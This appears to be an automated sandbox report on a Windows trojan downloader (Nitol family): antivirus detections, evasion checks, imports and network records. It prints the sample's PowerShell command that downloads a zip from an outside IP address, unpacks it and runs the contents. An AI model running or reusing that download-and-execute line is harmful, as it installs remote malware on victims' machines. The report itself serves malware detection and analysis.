8.0
High risk

8d554a5f3cc60af16fa56cf9eb35f749b16e5e97a5b1c07072a7ce0d3d22cb8c

8b85136d433852a0e15f8d3c74373445.exe

Analysis time: 90s

Last analyzed:

File size: 1.1MB
Static and dynamic detection tags: CLOUD DELF ECUF FALSESIGN FMWBUS GDSDA GENERICKD GENERICR INVALIDSIG MEYO NITOL R255164 SUSPICIOUS PE UKEZF UWAMSON WZ3UDZPMPG0
Eagle Eye engine
Not detected: no Eagle Eye engine results available
Static verdict
Antivirus engines
Engine | Result | Scan time | Engine version
McAfee | GenericR-OWW!8B85136D4338 | 20190503 | 6.0.6.653
Alibaba | TrojanDownloader:Win32/Nitol.abc4a52c | 20190426 | 0.4.0.6
Baidu | - | 20190318 | 1.0.0.2
Avast | Win32:Malware-gen | 20190507 | 18.4.3895.0
Tencent | Win32.Trojan.Falsesign.Ecuf | 20190508 | 1.0.0.1
Kingsoft | - | 20190508 | 2013.8.14.323
CrowdStrike | - | 20190212 | 1.0
Static indicators
Queries for the computername (8 events)
Time & API Arguments Status Return Repeated
1620946633.32716
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1620973014.622001
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1620973014.653001
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1620973014.684001
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1620973014.715001
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1620973020.215001
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
1620973020.215001
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1620973021.340001
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
Checks if process is being debugged by a debugger (1 event)
Time & API Arguments Status Return Repeated
1620973015.575001
IsDebuggerPresent
failed 0 0
Uses Windows APIs to generate a cryptographic key (50 out of 66 events; only the first is shown below, the remaining calls differ only in timestamp and crypto_handle)
Time & API Arguments Status Return Repeated
1620973017.544001
CryptExportKey
crypto_handle: 0x006684f8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
This executable is signed
Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)
Time & API Arguments Status Return Repeated
1620973011.544001
GlobalMemoryStatusEx
success 1 0
The executable contains unknown PE section names indicative of a packer (could be a false positive) (2 events)
section .itext
section .didata
Behavioral verdict
Dynamic indicators
Allocates read-write-execute memory (usually to unpack itself) (50 out of 159 events; only the first three distinct call shapes are shown below, the remaining calls are further 4096-byte MEM_COMMIT allocations and NtProtectVirtualMemory calls with PAGE_EXECUTE_READWRITE that differ only in timestamp and base_address)
Time & API Arguments Status Return Repeated
1620973014.903001
NtAllocateVirtualMemory
process_identifier: 2216
region_size: 1835008
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 8192 (MEM_RESERVE)
base_address: 0x02ac0000
success 0 0
1620973014.903001
NtAllocateVirtualMemory
process_identifier: 2216
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02c40000
success 0 0
1620973015.419001
NtProtectVirtualMemory
process_identifier: 2216
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x73f31000
success 0 0
Creates a shortcut to an executable file (1 event)
file C:\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
Creates a suspicious process (1 event)
cmdline C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe (New-Object Net.WebClient).DownloadFile('http://192.198.89.219/Demeter0402.zip?vivadeverdadeamor','C:\OSKAR-PC\obTKsNtL.zip');(new-object -com shell.application).namespace('C:\OSKAR-PC').CopyHere((new-object -com shell.application).namespace('C:\OSKAR-PC\obTKsNtL.zip').Items(),16);Start-ProcessC:\OSKAR-PC\Demeter0402
Checks adapter addresses which can be used to detect virtual network interfaces (1 event)
Time & API Arguments Status Return Repeated
1620973021.465001
GetAdaptersAddresses
flags: 15
family: 0
failed 111 0
Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)
Time & API Arguments Status Return Repeated
1620973017.247001
LookupPrivilegeValueW
system_name:
privilege_name: SeDebugPrivilege
success 1 0
Network communication
Communicates with host for which no DNS query was performed (2 events)
host 172.217.24.14
host 192.198.89.219
Deletes executed files from disk (1 event)
file C:\OSKAR-PC\obTKsNtL.zip
Creates a suspicious PowerShell process (1 event)
value Uses powershell to execute a file download from the command line
Generates some ICMP traffic
Connects to an IP address that is no longer responding to requests (legitimate services will usually remain up and running) (1 event)
dead_host 192.198.89.219:80
File has been identified by 44 AntiVirus engines on VirusTotal as malicious (44 events)
MicroWorld-eScan Trojan.GenericKD.31668118
FireEye Trojan.GenericKD.31668118
CAT-QuickHeal Trojan.Nitol
McAfee GenericR-OWW!8B85136D4338
Zillya Trojan.Nitol.Win32.27
Alibaba TrojanDownloader:Win32/Nitol.abc4a52c
K7GW Trojan-Downloader ( 0054720c1 )
K7AntiVirus Trojan-Downloader ( 0054720c1 )
Cyren W32/Trojan.MEYO-6824
Symantec Trojan.Gen.2
TrendMicro-HouseCall TROJ_GEN.F0C2C00B519
Paloalto generic.ml
Kaspersky HEUR:Trojan.Win32.Nitol.gen
BitDefender Trojan.GenericKD.31668118
NANO-Antivirus Trojan.Win32.Nitol.fmwbus
AegisLab Trojan.Win32.Nitol.4!c
Avast Win32:Malware-gen
Tencent Win32.Trojan.Falsesign.Ecuf
Sophos Mal/Generic-S
F-Secure Trojan.TR/Nitol.ukezf
VIPRE Trojan.Win32.Generic!BT
TrendMicro TROJ_GEN.F0C2C00B519
McAfee-GW-Edition GenericR-OWW!8B85136D4338
Emsisoft Trojan.GenericKD.31668118 (B)
Ikarus Trojan.SuspectCRC
Avira TR/Nitol.ukezf
Fortinet W32/Nitol!tr
Antiy-AVL Trojan/Win32.Nitol
Arcabit Trojan.Generic.D1E33796
ZoneAlarm HEUR:Trojan.Win32.Nitol.gen
Microsoft Program:Win32/Uwamson.A!ml
AhnLab-V3 Trojan/Win32.Agent.R255164
ALYac Trojan.GenericKD.31668118
ESET-NOD32 a variant of Win32/TrojanDownloader.Delf.CPY
Rising Downloader.Delf!8.16F (CLOUD)
Yandex Trojan.Nitol!WZ3udZpmPG0
SentinelOne DFI - Suspicious PE
eGambit PE.Heur.InvalidSig
GData Trojan.GenericKD.31668118
Ad-Aware Trojan.GenericKD.31668118
AVG Win32:Malware-gen
Cybereason malicious.d43385
Panda Trj/GdSda.A
Qihoo-360 Win32/Trojan.8f0
Visual analysis
Binary image
No binary image: no binary visualization image was generated for this sample
Runtime screenshots
No runtime screenshots: no screenshots were captured while this sample ran

PE Compile Time

2019-02-04 21:33:30

Imports

Library kernel32.dll:
0x4e12a8 SetFilePointer
0x4e12ac GetACP
0x4e12b0 CloseHandle
0x4e12b4 LocalFree
0x4e12b8 SuspendThread
0x4e12bc VirtualProtect
0x4e12c0 GetTickCount
0x4e12c4 IsDebuggerPresent
0x4e12c8 GetFullPathNameW
0x4e12cc VirtualFree
0x4e12d0 HeapAlloc
0x4e12d4 GetStartupInfoW
0x4e12d8 ExitProcess
0x4e12dc GetFileAttributesW
0x4e12e4 GetCPInfoExW
0x4e12e8 GetThreadPriority
0x4e12ec GetCurrentProcess
0x4e12f0 SetThreadPriority
0x4e12f4 VirtualAlloc
0x4e12f8 RtlUnwind
0x4e12fc GetCPInfo
0x4e1300 GetCommandLineW
0x4e1304 GetSystemInfo
0x4e1308 ResumeThread
0x4e130c GetProcAddress
0x4e1314 EnumSystemLocalesW
0x4e1318 GetStdHandle
0x4e131c GetVersionExW
0x4e1320 VerifyVersionInfoW
0x4e1324 GetModuleHandleW
0x4e1328 FreeLibrary
0x4e132c HeapCreate
0x4e1330 HeapDestroy
0x4e1334 ReadFile
0x4e1338 GetDiskFreeSpaceW
0x4e133c VerSetConditionMask
0x4e1344 FindFirstFileW
0x4e1348 CreateProcessW
0x4e134c HeapSize
0x4e1350 GetModuleFileNameW
0x4e1354 GetLastError
0x4e1358 lstrlenW
0x4e135c SetEndOfFile
0x4e1364 CompareStringW
0x4e1368 CreateThread
0x4e136c HeapFree
0x4e1370 WideCharToMultiByte
0x4e1374 MultiByteToWideChar
0x4e1378 FindClose
0x4e137c LoadLibraryA
0x4e1380 ResetEvent
0x4e1384 SetEvent
0x4e1388 CreateFileW
0x4e138c GetLocaleInfoW
0x4e1390 GetVersion
0x4e1394 DeleteFileW
0x4e1398 MoveFileW
0x4e139c RaiseException
0x4e13a0 FormatMessageW
0x4e13a4 SwitchToThread
0x4e13a8 GetExitCodeThread
0x4e13ac GetLocalTime
0x4e13b0 GetConsoleWindow
0x4e13b4 WaitForSingleObject
0x4e13b8 GetCurrentThread
0x4e13bc WriteFile
0x4e13c0 ExitThread
0x4e13c4 CreatePipe
0x4e13cc GetDateFormatW
0x4e13d0 TlsGetValue
0x4e13d4 GetComputerNameW
0x4e13d8 IsValidLocale
0x4e13dc TlsSetValue
0x4e13e0 CreateDirectoryW
0x4e13e4 LoadLibraryExW
0x4e13ec EnumCalendarInfoW
0x4e13f0 LocalAlloc
0x4e13f4 GetCurrentThreadId
0x4e13fc VirtualQuery
0x4e1400 CreateEventW
0x4e1404 VirtualQueryEx
0x4e1408 GetThreadLocale
0x4e140c Sleep
0x4e1410 SetThreadLocale
Library shell32.dll:
0x4e1418 ShellExecuteW
Library version.dll:
0x4e1424 VerQueryValueW
0x4e1428 GetFileVersionInfoW
Library user32.dll:
0x4e1430 CharUpperBuffW
0x4e1434 CharNextW
0x4e143c ShowWindow
0x4e1440 CharLowerBuffW
0x4e1444 LoadStringW
0x4e1448 CharUpperW
0x4e144c PeekMessageW
0x4e1450 GetSystemMetrics
0x4e1454 MessageBoxW
Library oleaut32.dll:
0x4e145c SysAllocStringLen
0x4e1460 SafeArrayPtrOfIndex
0x4e1464 VariantCopy
0x4e1468 SafeArrayGetLBound
0x4e146c SafeArrayGetUBound
0x4e1470 VariantInit
0x4e1474 VariantClear
0x4e1478 SysFreeString
0x4e147c SysReAllocStringLen
0x4e1480 VariantChangeType
0x4e1484 SafeArrayCreate
Library netapi32.dll:
0x4e148c NetWkstaGetInfo
0x4e1490 NetApiBufferFree
Library advapi32.dll:
0x4e1498 RegQueryValueExW
0x4e149c RegCloseKey
0x4e14a0 RegOpenKeyExW

Exports

Ordinal Address Name
3 0x45c70c TMethodImplementationIntercept
2 0x41010c __dbk_fcall_wrapper
1 0x4de63c dbkFCallWrapperAddr

Hosts

No hosts contacted.

TCP

No TCP connections recorded.

UDP

Source Source Port Destination Destination Port
192.168.56.101 50002 114.114.114.114 53
192.168.56.101 53237 114.114.114.114 53
192.168.56.101 57756 114.114.114.114 53
192.168.56.101 58367 114.114.114.114 53
192.168.56.101 62318 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 49235 224.0.0.252 5355
192.168.56.101 50534 224.0.0.252 5355
192.168.56.101 51963 224.0.0.252 5355
192.168.56.101 53657 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 57874 224.0.0.252 5355
192.168.56.101 60384 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 63429 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900
192.168.56.101 50003 239.255.255.250 3702
192.168.56.101 58707 239.255.255.250 3702

HTTP & HTTPS Requests

No HTTP requests performed.

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.